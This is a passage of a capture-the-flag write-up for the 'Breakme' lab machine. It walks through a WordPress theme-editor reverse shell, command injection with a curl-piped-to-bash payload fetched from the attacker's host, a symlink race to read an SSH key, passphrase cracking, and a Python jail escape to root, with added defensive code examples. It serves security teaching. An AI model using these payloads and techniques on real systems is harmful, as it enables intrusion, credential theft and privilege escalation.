http://breakme.thm/wordpress/wp-admin/theme-editor.php
```

In the editor we first switch the theme selector to `Twenty Twenty-One`: unlike the active block theme (Twenty Twenty-Four, whose templates are HTML files), it ships a classic PHP template for the 404 page. We select `404.php`, replace its entire content with the reverse shell and update the file.

<figure><img src="/files/jBVh7yWljDtwWMXJQnx6" alt=""><figcaption></figcaption></figure>

Now we only need to call up our edited page with the following URL:

[`http://breakme.thm/wordpress/wp-content/themes/twentytwentyone/404.php`](http://breakme.thm/wordpress/wp-content/themes/twentytwentyone/404.php)

We catch the reverse shell on our listener. We are `www-data` and cannot read the first flag yet.

```
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 1337                        
listening on [any] 1337 ...
connect to [10.17.15.155] from (UNKNOWN) [10.10.221.241] 43952
Linux Breakme 5.10.0-8-amd64 #1 SMP Debian 5.10.46-4 (2021-08-03) x86_64 GNU/Linux
 03:49:00 up  2:18,  0 users,  load average: 0.00, 0.00, 0.11
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: cannot set terminal process group (616): Inappropriate ioctl for device
bash: no job control in this shell
www-data@Breakme:/$ 
```

First, let's upgrade this shell to a full TTY.

{% embed url="<https://0xffsec.com/handbook/shells/full-tty/>" %}

We transfer linpeas to the machine and run it.

<figure><img src="/files/r0H1ZuQVnLNfHwwNifFQ" alt=""><figcaption></figcaption></figure>

The linpeas output shows that some files of the users `john` and `youcef` are accessible to us.

<figure><img src="/files/4PDXr9pDVifFegcWcywE" alt=""><figcaption></figcaption></figure>

The first flag is in john's home directory, but `www-data` cannot read it, so we need to become `john`.

## Reverse Shell as john

While enumerating as `www-data`, we notice an internal service listening on port 9999, bound to 127.0.0.1 only (MySQL on 3306 is local as well).

```bash
www-data@Breakme:/home/john$ netstat -tulnp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address    Foreign Address   State   PID/Program name    
tcp        0      0 127.0.0.1:3306   0.0.0.0:*         LISTEN      -
tcp        0      0 127.0.0.1:9999   0.0.0.0:*         LISTEN      -
tcp        0      0 0.0.0.0:22       0.0.0.0:*         LISTEN      -
tcp6       0      0 :::80            :::*              LISTEN      -
tcp6       0      0 :::22            :::*              LISTEN      -
udp        0      0 0.0.0.0:68       0.0.0.0:*                     -   
```

This seems to be another site, possibly an entry point to user `john`.

```bash
www-data@Breakme:/tmp$ curl 127.0.0.1:9999
<html>
<head>
        <title>Test</title>
        <style>
                .checkTarget{
                        position:absolute;
                        width:calc(30%);
                        height:450px;
                        top:calc(10%);
                        left:calc(2.5%);
                        border:3px solid green;
                        border-radius:5%;
                        background-color:rgb(180,220,180);
                        text-align:center;
                }
                .checkUser{
                        position:absolute;
                        width:calc(30%);
                        height:450px;
                        top:calc(10%);
                        left:calc(35%);
                        border:3px solid green;
                        border-radius:5%;
                        background-color:rgb(180,220,180);
                        text-align:center;
                }
                .checkFile{
                        position:absolute;
                        width:calc(30%);
                        height:450px;
                        top:calc(10%);
                        left:calc(67.5%);
                        border:3px solid green;
                        border-radius:5%;
                        background-color:rgb(180,220,180);
                        text-align:center;
                }
                body{
                        background-color:rgb(200,200,200);
                }
                pre{
                        white-space:pre-wrap;
                        word-wrap:break-word;
                        overflow:auto;
                        width:calc(100%);
                        height:180px;
                        text-align:center;
                }
                .output{
                        width:calc(100%);
                        text-align:center;
                }
        </style>
</head>
<body>
        



        <h1 style="color:rgb(50,100,50);">My Tools:</h1>
        <!--Only numerical IPs allowed -->
        <div class="container">
        <form class="checkTarget" method="POST">
                <h3>Check Target:</h3>
                <input name="cmd1" style="border-radius:5%;border:3px solid green;height:30px" type="text" placeholder="Target IP" /><br><br>
                <input style="width:70px" type="submit" value="Run" /><br><br><br>
                <h3>Result:</h3><br>
                <div class="output"><pre></pre></div>
        </form>
        <form class="checkUser" method="POST">
                <h3>Check User:</h3>
                <input name="cmd2" style="border-radius:5%;border:3px solid green;height:30px" type="text" placeholder="User name" /><br><br>
                <input style="width:70px" type="submit" value="Run" /><br><br><br>
                <h3>Result:</h3><br>
                <div class="output"><pre></pre></div>
        </form>
        <form class="checkFile" method="POST">
                <h3>Check File:</h3>
                <input name="cmd3" style="border-radius:5%;border:3px solid green;height:30px" type="text" placeholder="File name" /><br><br>
                <input style="width:70px" type="submit" value="Run" /><br><br><br>
                <h3>Result:</h3>
                <div class="output"><pre></pre></div>
        </form>
        </div>
</body>
</html>

```

Before we continue, we look at the background processes with pspy. It shows that the service on port 9999 is a web server running as the user with uid `1002`.

<figure><img src="/files/IBvUWQweQroq4chCp6cH" alt=""><figcaption></figcaption></figure>

This is our user `john`.

We now want to investigate the service on port `9999` further. To do this, we create a tunnel using Ligolo-ng to gain access to it.

### Setup Ligolo-ng <a href="#setup-ligolo-ng" id="setup-ligolo-ng"></a>

{% embed url="<https://github.com/nicocha30/ligolo-ng>" %}

First, we create a TUN (network tunnel) interface named `ligolo` and add a route so that traffic for `240.0.0.1` goes through it.

```bash
┌──(kali㉿kali)-[~]
└─$ sudo ip tuntap add user 0xb0b mode tun ligolo
[sudo] password for kali: 
                        
┌──(kali㉿kali)-[~]
└─$ sudo ip link set ligolo up 

┌──(kali㉿kali)-[~]
└─$ sudo ip route add 240.0.0.1 dev ligolo
```

Next, we download the ligolo-ng release. We need the `proxy` (for our attack machine) and the `agent` (for the target); both are available as linux amd64 builds.

{% embed url="<https://github.com/nicocha30/ligolo-ng/releases/tag/v0.7.2-alpha>" %}

On our attack machine, we start the proxy server.

```bash
./proxy -selfcert
```

<figure><img src="/files/ilsFFfYPL6HbKSK6XPlY" alt=""><figcaption></figcaption></figure>

Next on the target machine we start the agent to connect to our proxy.

<figure><img src="/files/iuki5AuSeJcl3G9GLzCx" alt=""><figcaption></figcaption></figure>

```bash
./agent -connect 10.8.211.1:11601 --ignore-cert
```

We receive a message on our ligolo-ng proxy that an agent has joined. We select it with `session` and start the tunnel with `start`.

<figure><img src="/files/3aKv5UrjDWll5imOk688" alt=""><figcaption></figcaption></figure>

We are now able to reach internal port 9999 via the address `240.0.0.1`: ligolo-ng maps this address to the agent's own loopback interface (127.0.0.1), so `http://240.0.0.1:9999` hits the service bound to localhost on the target.

Here we have a page with tools that include a check target, a check user and check file. This suggests that some kind of command injection could be possible.

<figure><img src="/files/Ua0MCBnmClA47MTuJ5ox" alt=""><figcaption></figcaption></figure>

If we enter our IP at Check Target, we find that a ping is actually executed. The input only allows the numerical representation of IP addresses.

<figure><img src="/files/GbCzlKcsgq8QdEIOALvk" alt=""><figcaption></figcaption></figure>

Check User reflects our input, but we cannot get a hit for a valid user, not even for the known `john`, `bob` or `www-data`.

The file check does not seem to find any files either. Special characters or numbers do not seem to be permitted here.

We enter a set of special characters in Check User and see that a small set is reflected. Not everything is removed. We also notice that the space character is removed.


```bash
!@#$%^&*()_+-={}[]|:;'"<>,.?/
```

With the characters that survive the filter we can try a command injection: `|` starts a second command after whatever the form runs, and `${IFS}` (the shell's internal field separator, which expands to whitespace) stands in for the stripped space. The input below therefore appends a `ping` to our machine:

`|ping${IFS}10.17.15.155`

We then capture the pings via `tcpdump` and see that our command injection was successful.

<figure><img src="/files/HRbqAsizmycUjmt9WoVf" alt=""><figcaption></figcaption></figure>
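To make the filter problem concrete, here is an added Python model of a "Check User" handler: a denylist that strips spaces and a few metacharacters before handing the value to a shell, next to a version that allowlists the value and never involves a shell. This is example code, not the service from the box (whose source we never see); the character set in `STRIPPED` and the `id <name>` command are assumptions chosen to reproduce the behaviour observed above.

```python
"""Command injection through a character denylist, and the allowlist fix.

Added example: a Python model of the 'Check User' form on port 9999, not
the service's own code. The stripped character set and the `id <name>`
command are assumptions that reproduce the behaviour seen in the writeup.
"""
import re
import subprocess

# Assumed denylist: spaces and a handful of metacharacters are dropped,
# but '|', '$', '{' and '}' survive, which is all that ${IFS} needs.
STRIPPED = set(" &;`\\\"<>\n\r")


def naive_filter(user_input: str) -> str:
    """Vulnerable: remove 'dangerous' characters and hope for the best."""
    return "".join(c for c in user_input if c not in STRIPPED)


def build_check_user_vulnerable(user_input: str) -> str:
    """Vulnerable: splice the filtered value into a shell command line."""
    return f"id {naive_filter(user_input)}"


def run_vulnerable(user_input: str) -> str:
    """shell=True hands the line to /bin/sh: '|' starts a second command and
    the shell, not our code, expands ${IFS} back into whitespace."""
    cmd = build_check_user_vulnerable(user_input)
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


# Hardened: an allowlist for POSIX-style user names; nothing else gets through.
USERNAME_RE = re.compile(r"[a-z_][a-z0-9_-]{0,31}")


def build_check_user_safe(user_input: str) -> list:
    """Validate against the allowlist and return an argv list for exec."""
    if not USERNAME_RE.fullmatch(user_input):
        raise ValueError(f"invalid user name: {user_input!r}")
    return ["id", user_input]


def run_safe(user_input: str) -> str:
    """No shell: the name is one argv element, so metacharacters are data."""
    argv = build_check_user_safe(user_input)
    return subprocess.run(argv, capture_output=True, text=True).stdout


if __name__ == "__main__":
    # The writeup's probe, with ping swapped for echo so it runs anywhere.
    print(run_vulnerable("|echo${IFS}injected"), end="")
    try:
        run_safe("|echo${IFS}injected")
    except ValueError as e:
        print(e)
```

For the "Check Target" form the same fix applies with `ipaddress.ip_address()` as the allowlist: parse the input into an address object and pass `str(addr)` as a single argument to `ping`, rather than stripping characters from a string that still ends up in a shell.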

Next, we prepare a simple reverse shell payload. Because `&` is filtered we cannot chain commands with `&&` or background them; instead we host a shell script and fetch and execute it in a single pipeline with `curl`.

Then we set up a Python web server to provide the payload.

We replace our ping with a curl command, to see if we can successfully request the payload.


```
|curl${IFS}http://10.17.15.155/payload.sh
```

<figure><img src="/files/PLtL2VA4DUD3irFRC0o2" alt=""><figcaption></figcaption></figure>

Now we set up a listener on port `4446` and adapt our command with a pipe to bash.

```
|curl${IFS}http://10.17.15.155/payload.sh|bash
```

<figure><img src="/files/POMdkkQOWVh2gdEmqABC" alt=""><figcaption></figcaption></figure>

This gives us our first flag.

<figure><img src="/files/Q2rt4OnRlYb2jt5sPwk3" alt=""><figcaption></figcaption></figure>

## Reverse Shell as Youcef

In the home directory of `youcef` we find that we have access to other files, including `readfile`.

To examine them on our attack machine, we start a Python web server in that directory and download them from there.

Since `readfile.c` is not readable for us, we decompile the `readfile` binary instead. It has the SUID bit set and is owned by `youcef`, so it reads files with youcef's privileges; our target is youcef's SSH key. The naive attempts fail: asking for the key is answered with a "file not found" error, and asking for `readfile.c` gets a `Nice Try!`, so some filtering is in place.

The decompiled code shows what that filtering is. The program exits with a usage message if no argument is given, exits if the file does not exist, and insists on running as UID 1002 (`john`). If the file name contains `flag` or `id_rsa`, or the path is a symlink, it prints `Nice Try!` and refuses; files that `john` cannot access fail as well. Only when all checks pass does it pause briefly (`usleep`) and then open and print the file. That pause separates the check from the use: the symlink test is made on the path name, and the same name is resolved again at `open()`, so a name whose target changes in between slips through. This is a time-of-check/time-of-use (TOCTOU) race condition.

### Race Condition <a href="#race-condition" id="race-condition"></a>

To exploit the race, we create a regular file and rapidly toggle it between a regular file and a symlink pointing at the file we actually want (youcef's SSH key). The goal is that the symlink check sees the regular file and passes, but by the time the program reaches `open()`, the same name is a symlink to the target, so the restriction is bypassed.

For this, we will first use a loop to constantly switch the file between these two states and run it in the background.

{% code overflow="wrap" %}

```bash
while true; do ln -sf /home/youcef/.ssh/id_rsa symlink; rm symlink; touch symlink; done &
```

{% endcode %}

Now, we will create another loop that continuously runs the program, hoping to win the race condition. If we succeed, it will print the output and exit.

```bash
for i in {1..30}; do /home/youcef/readfile symlink; done
```

As we can see, after a while, we win the race and manage to read `/home/youcef/.ssh/id_rsa`.

<figure><img src="/files/qFWCk9AqUspG1kCFLFjJ" alt=""><figcaption></figcaption></figure>
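The following added Python example models the race just won and the way to close it. It is not the `readfile` binary from the box (we only ever saw that decompiled) nor code from the writeup: `read_file_vulnerable` mirrors the decompiled logic (name denylist, symlink check on the path, pause, open), and `read_file_safe` opens first with `O_NOFOLLOW` and makes every decision on the open descriptor. The pause is exposed as a hook so the swap can be injected into the window on demand; the temporary files and their contents are constructed for the demo.

```python
"""TOCTOU in a readfile-style checker, and a version that closes the window.

Added example: not the readfile binary from the box (we only saw it
decompiled) and not code from the writeup. The checker mirrors the logic
described above (refuse 'flag'/'id_rsa' names, refuse symlinks, pause, then
open and print); the pause is a hook here, a usleep() in the binary.
"""
import errno
import os
import stat
import tempfile

DENIED = ("flag", "id_rsa")


def read_file_vulnerable(path, between_check_and_open=lambda: None):
    """Check a *name*, then open the same name again: the classic race."""
    if any(bad in path for bad in DENIED):
        raise PermissionError("Nice Try!")
    if os.path.islink(path):            # time of check: lstat() on the name
        raise PermissionError("Nice Try!")
    between_check_and_open()            # the usleep() window
    with open(path, "rb") as f:         # time of use: name resolved again
        return f.read()


def read_file_safe(path, between_check_and_open=lambda: None):
    """Open once with O_NOFOLLOW, then decide on the open descriptor."""
    if any(bad in path for bad in DENIED):
        raise PermissionError("Nice Try!")
    try:
        fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)
    except OSError as e:
        if e.errno == errno.ELOOP:      # final path component is a symlink
            raise PermissionError("Nice Try!") from e
        raise
    try:
        if not stat.S_ISREG(os.fstat(fd).st_mode):  # what we opened, not a name
            raise PermissionError("not a regular file")
    except BaseException:
        os.close(fd)
        raise
    between_check_and_open()            # swapping the name changes nothing now
    with os.fdopen(fd, "rb") as f:
        return f.read()


def _regular_file(path, data=b""):
    """Constructed fixture: (re)create path as a plain file with data."""
    if os.path.lexists(path):
        os.unlink(path)
    with open(path, "wb") as f:
        f.write(data)


def _swap_to_symlink(victim, secret):
    """The attacker's move from the writeup's loop: file becomes symlink."""
    os.unlink(victim)
    os.symlink(secret, victim)


def deterministic_demo():
    """Inject the swap into the check/use window of both readers."""
    with tempfile.TemporaryDirectory() as d:
        secret, victim = os.path.join(d, "secret"), os.path.join(d, "victim")
        _regular_file(secret, b"SECRET")        # stands in for youcef's key
        _regular_file(victim)
        leaked = read_file_vulnerable(victim, lambda: _swap_to_symlink(victim, secret))
        _regular_file(victim, b"plain")
        kept = read_file_safe(victim, lambda: _swap_to_symlink(victim, secret))
        try:
            read_file_safe(victim)              # victim is a symlink by now
            refused = False
        except PermissionError:
            refused = True
        return {"vulnerable": leaked, "safe": kept, "safe_refuses_symlink": refused}


if __name__ == "__main__":
    print(deterministic_demo())
```

`O_NOFOLLOW` only refuses a symlink in the final path component; if a directory above the file is attacker-controlled, the safe variant additionally needs to open that directory first and open the file relative to it (`dir_fd=` in Python, `openat()` in C). A SUID helper like `readfile` should also check `st_uid` on the `fstat` result rather than trusting anything derived from the name.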

### SSH Connection <a href="#ssh-connection" id="ssh-connection"></a>

Now that we have the SSH key, we encounter an additional obstacle: the key is encrypted with a passphrase. To use it for a shell on the target we will have to crack that passphrase.

```bash
┌──(kali㉿kali)-[~/Desktop/Transfer]
└─$ ssh -i id_rsa youcef@breakme.thm
Enter passphrase for key 'id_rsa':
```

We can try to crack the passphrase offline. First we convert the key with the `ssh2john` utility, which turns the encrypted private key into a hash format that *John the Ripper* recognizes.

```bash
$ ssh2john id_rsa > ssh_key.hash
```

After converting the key, we run `john` with the rockyou wordlist against the hash and obtain the passphrase.

{% code overflow="wrap" %}

```bash
┌──(kali㉿kali)-[~/Desktop/Transfer]
└─$ john ssh_key.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:06 0.00% (ETA: 2024-10-10 21:56) 0g/s 53.50p/s 53.50c/s 53.50C/s cancer..michael1
[REDACTED]          (id_rsa)     
1g 0:00:00:12 DONE (2024-10-07 16:28) 0.07782g/s 52.29p/s 52.29c/s 52.29C/s gracie..kelly
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

```

{% endcode %}

Using the key and the passphrase we cracked, we log in as `youcef`; with this shell we can read youcef's files and look for the second flag.

```bash
┌──(kali㉿kali)-[~/Desktop/Transfer]
└─$ ssh -i id_rsa youcef@breakme.thm                             
Enter passphrase for key 'id_rsa': 
Linux Breakme 5.10.0-8-amd64 #1 SMP Debian 5.10.46-4 (2021-08-03) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Mar 21 07:55:16 2024 from 192.168.56.1
youcef@Breakme:~$ id
uid=1000(youcef) gid=1000(youcef) groups=1000(youcef)
```

This gives us our 2nd flag.

<figure><img src="/files/jn9hjKhVyQc3co2Ce2Mn" alt=""><figcaption></figcaption></figure>

## Privilege Escalation

{% code overflow="wrap" %}

```bash
youcef@Breakme:~$ sudo -l
Matching Defaults entries for youcef on breakme:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User youcef may run the following commands on breakme:
    (root) NOPASSWD: /usr/bin/python3 /root/jail.py
```

{% endcode %}

Executing the program reveals that we are operating within a Python jail, which prompts us for input.&#x20;

```bash
youcef@Breakme:~$ sudo /usr/bin/python3 /root/jail.py
  Welcome to Python jail  
  Will you stay locked forever  
  Or will you BreakMe  
>> 
```

Upon testing the input, we discover that entering invalid Python code triggers a `Wrong Input` message.

```bash
youcef@Breakme:~$ sudo /usr/bin/python3 /root/jail.py
  Welcome to Python jail  
  Will you stay locked forever  
  Or will you BreakMe  
>> test
Wrong Input
>> 
```

When we input valid Python code, it runs, so our input is evidently handed to `exec()` (or `eval()`) more or less directly.

```bash
youcef@Breakme:~$ sudo /usr/bin/python3 /root/jail.py
  Welcome to Python jail  
  Will you stay locked forever  
  Or will you BreakMe  
>> test
Wrong Input
>> print(hello)
Wrong Input
>> print('hello')
hello
>> 
```

However, if we try to import a module to run commands, we see the message `Illegal Input` and the program exits. This indicates that there must be some filtering in place.

```bash
>> import os
Illegal Input
youcef@Breakme:~$ 
```

So the obvious route (import `os`, spawn a shell) is blocked by a denylist applied to our input string. The jail still runs whatever survives the filter, so our goal is to reach the same objects through names the denylist does not match.

Looking for common Python jail bypass payloads, we find the following payload [here](https://book.hacktricks.xyz/generic-methodologies-and-resources/python/bypass-python-sandboxes#builtins). It imports the `os` module and calls the `system` function from it:

* `__builtins__.__import__("os").system("ls")`

But, if we try it in our case, we see that it fails.

```bash
>> __builtins__.__import__("os").system("ls")
Illegal Input
```

To begin our exploration, we first attempt to access the `import` function using `__builtins__.__import__`. However, we quickly discover that this functionality is restricted.

```bash
>> __builtins__.__import__
Illegal Input
```

By breaking down our payload and testing its individual components, we determine that the problem originates from the `__import__` function and the quotation marks.

```bash
>> __builtins__
>> __import__
Illegal Input
>> "
Illegal Input
```

To get around the quotation marks we use single quotes (`'`).

For `__import__`, instead of the attribute access `__builtins__.__import__` we go through the builtins dictionary, `__builtins__.__dict__['__import__']`. That way `__import__` is supplied as a string, and a string we can transform at run time, after the filter has already looked at our input. The filter is case-sensitive: `__IMPORT__` passes it and only fails later because no such name exists.

```bash
>> __IMPORT__
Wrong Input
```

We can utilize `__IMPORT__` and then apply a method to convert it to `__import__`. One method we can use is `lower()`, which transforms all uppercase letters into lowercase.

```bash
>> __builtins__.__dict__['__IMPORT__'.lower()]
Illegal Input
```

Testing the parts of our input once more, we find that `lower` is also not allowed.

```bash
>> __builtins__
>> __dict__
Wrong Input
>> []
>> ()
>> '
Wrong Input
>> __IMPORT__
Wrong Input
>> lower
Illegal Input
```

Looking for alternatives to `lower`, we find `casefold()`, which also maps the string to lower case (it is the more aggressive Unicode variant of `lower()`). This method is not filtered and works.

```bash
>> print(__builtins__.__dict__['__IMPORT__'.casefold()])
<built-in function __import__>
```

Returning to our payload, we find that when we attempt to import the `os` module, it is also not allowed, and we can see the reason why: `os` is filtered as well.

```bash
>> __builtins__.__dict__['__IMPORT__'.casefold()]('os')
Illegal Input
>> os
Illegal Input
```

Since `os` is already supplied as a string and `OS` is not filtered, we can use the `casefold` method once more to bypass it.

As we can see, this works, and we are able to access the `os` module

```bash
>> print(__builtins__.__dict__['__IMPORT__'.casefold()]('OS'.casefold()))
<module 'os' from '/usr/lib/python3.9/os.py'>
```

However, if we try to access the `system` function, we find that we fail once more.

```bash
>> __builtins__.__dict__['__IMPORT__'.casefold()]('OS'.casefold()).system
Illegal Input
```

This time, it’s because `system` is filtered.

```bash
>> system
Illegal Input
```

Now, we can use `__dict__` once more to be able to use `system` as a string and apply the `casefold` method to bypass the filter.

As we can see, this allows us to access the `system` function successfully.

{% code overflow="wrap" %}

```bash
>> print(__builtins__.__dict__['__IMPORT__'.casefold()]('OS'.casefold()).__dict__['SYSTEM'.casefold()])
<built-in function system>
```

{% endcode %}

The full payload calls that function with `/lib/yorick/bin/yorick`, an interpreter installed on the box. Rather than spawning a shell directly from Python, we let Yorick do it: its `system` command runs `bash`, and since the jail is executed via `sudo`, that shell runs as root and can read the third flag.

{% code overflow="wrap" %}

```bash
youcef@Breakme:~$ sudo /usr/bin/python3 /root/jail.py
  Welcome to Python jail
  Will you stay locked forever
  Or will you BreakMe
>> __builtins__.__dict__['__IMPORT__'.casefold()]('OS'.casefold()).__dict__['SYSTEM'.casefold()]('/lib/yorick/bin/yorick')

 Copyright (c) 2005.  The Regents of the University of California.
 All rights reserved.  Yorick 2.2.04 ready.  For help type 'help'
> system, "bash"
root@Breakme:/home/youcef# cd ~
root@Breakme:~# id
uid=0(root) gid=0(root) groups=0(root)
```

{% endcode %}
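As an added example of why this bypass had to work, here is a Python model of the jail and its filter, with the writeup's payload run against it. This is not `/root/jail.py` from the box (its source was never read); the denylist in `BANNED` is an assumption reconstructed from the probes above. The second half goes beyond the box: it replaces the substring denylist with a check on the syntax tree, which rejects the `casefold()` payload, and then shows a different payload (assembled from string fragments and `getattr`) that gets past that check too.

```python
"""Why a substring denylist in front of exec()/eval() is not a sandbox.

Added example: this is not /root/jail.py from the box (its source was never
read), only a model assumed from the behaviour seen above: 'Wrong Input'
when the code fails to run, 'Illegal Input' when a blocked word appears.
"""
import ast
import builtins
import os

# Assumed denylist, reconstructed from the probes in the writeup.
BANNED = ("import", "os", "system", "lower", '"', "eval", "exec", "open")


def text_verdict(src: str) -> str:
    """Model of the jail's check: case-sensitive substring match."""
    return "Illegal Input" if any(b in src for b in BANNED) else "ok"


def ast_verdict(src: str) -> str:
    """Stronger check on the syntax tree: any identifier or string literal
    containing a double underscore is rejected, however it is cased."""
    try:
        tree = ast.parse(src, mode="eval")
    except SyntaxError:
        return "Wrong Input"
    for node in ast.walk(tree):
        ident = None
        if isinstance(node, ast.Name):
            ident = node.id
        elif isinstance(node, ast.Attribute):
            ident = node.attr
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            ident = node.value
        if ident is not None and "__" in ident:
            return "Illegal Input"
    return "ok"


def run_jail(src: str, verdict=text_verdict):
    """Model of the jail body: filter, then evaluate with normal builtins."""
    v = verdict(src)
    if v != "ok":
        return v
    try:
        # Explicit globals so __builtins__ is the module, as in a script.
        return eval(src, {"__builtins__": builtins})
    except Exception:
        return "Wrong Input"


# The writeup's payload without the final call: every banned word is written
# upper-case inside a string and folded back at run time, after the check.
TEXT_BYPASS = ("__builtins__.__dict__['__IMPORT__'.casefold()]('OS'.casefold())"
               ".__dict__['SYSTEM'.casefold()]")

# Beats the AST check instead: no dunder identifier or literal ever appears;
# the names are assembled from fragments and fetched via getattr(), and
# print.__self__ is the builtins module.
AST_BYPASS = ("getattr(getattr(print, '_'*2+'self'+'_'*2),"
              " '_'*2+'import'+'_'*2)('os').system")


def text_filter_bypassed() -> bool:
    return run_jail(TEXT_BYPASS, text_verdict) is os.system


def ast_filter_bypassed() -> bool:
    return run_jail(AST_BYPASS, ast_verdict) is os.system


if __name__ == "__main__":
    print(text_verdict("import os"), ast_verdict(TEXT_BYPASS))
    print(text_filter_bypassed(), ast_filter_bypassed())
```

Moving the denylist from the raw text to the syntax tree only moves the bypass: as long as user input reaches `eval()`/`exec()` in a root process, a filter is not a security boundary. The actual mistake on this box is the sudo rule that lets `youcef` run the jail as root at all; untrusted code belongs in a separate, unprivileged process.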

We get our root flag.

<figure><img src="/files/0lJxGF7f6zEat8jEVNxN" alt=""><figcaption></figcaption></figure>

